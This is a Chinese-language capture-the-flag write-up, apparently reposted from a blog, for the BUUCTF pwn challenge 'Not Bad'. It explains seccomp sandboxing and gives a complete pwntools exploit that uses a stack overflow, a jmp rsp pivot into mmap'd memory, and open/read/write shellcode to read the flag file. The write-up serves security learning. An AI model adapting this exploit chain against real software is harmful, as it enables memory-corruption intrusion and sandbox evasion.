[BUUCTF-pwn]——[極客大挑戰 2019]Not Bad

又是一道收獲滿滿的題目.

peak小知識

• seccomp: seccomp是一種內核中的安全機制，正常情況下，程序可以使用所有的syscall,這是不安全的，比如程序劫持程序流后通過execve的syscall來getshell。所以可以通過seccomp_init、seccomp_rule_add、seccomp_load配合 或者prctl來ban掉一些系統調用.
• seccomp-tools: 沙盒工具, 可以查看那些系統調用可以被使用, 安裝在我的環境搭建專欄里面有, 也可以點我點我
  保護基本木有開啟, 只是開啟了地址隨機化
  
  在IDA中看看
  利用mmap創建了從0x123000開始長度為0x1000的可執行區域.
  不清楚的可以看下之前的peak小知識, 或者百度.
  
  發現一些系統調用被禁用
  

利用沙盒查看下, 發現read、write、open、exit系統調用可以使用.
一個典型的ORW問題

繼續看IDA

其實可以在棧上進行編寫shellcode的,但是發現大小不夠
所以可以轉跳至mmap的區域, 我們可以利用棧劫持, 將程序劫持到我們的棧上, 使其按照我們想要的方式運行

下面是exploit

exploit

from pwn import *p=remote('node3.buuoj.cn',26573) p = process('./bad') context.binary=ELF('./bad') #gdb.attach(p, 'b puts') mmap=0x123000 jmp_rsp=0x400A01# 劫持到棧上并執行buf的代碼 payload1=(asm(shellcraft.read(0,mmap,0x100))+asm("mov rax,0x123000;call rax")).ljust(0x28,'\x00')+p64(jmp_rsp)+asm("sub rsp,0x30;jmp rsp") p.sendafter('have fun!',payload1)#其實這個基本都是這樣可以記著 payload2=shellcraft.open('./flag') payload2+=shellcraft.read(3,mmap+0x100,0x50) payload2+=shellcraft.write(1,mmap+0x100,0x50)p.send(asm(payload2)) p.interactive() 與50位技術專家面對面20年技術見證，附贈技術全景圖

總結

以上是生活随笔為你收集整理的[BUUCTF-pwn]——[极客大挑战 2019]Not Bad(ORW)(内涵peak小知识)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。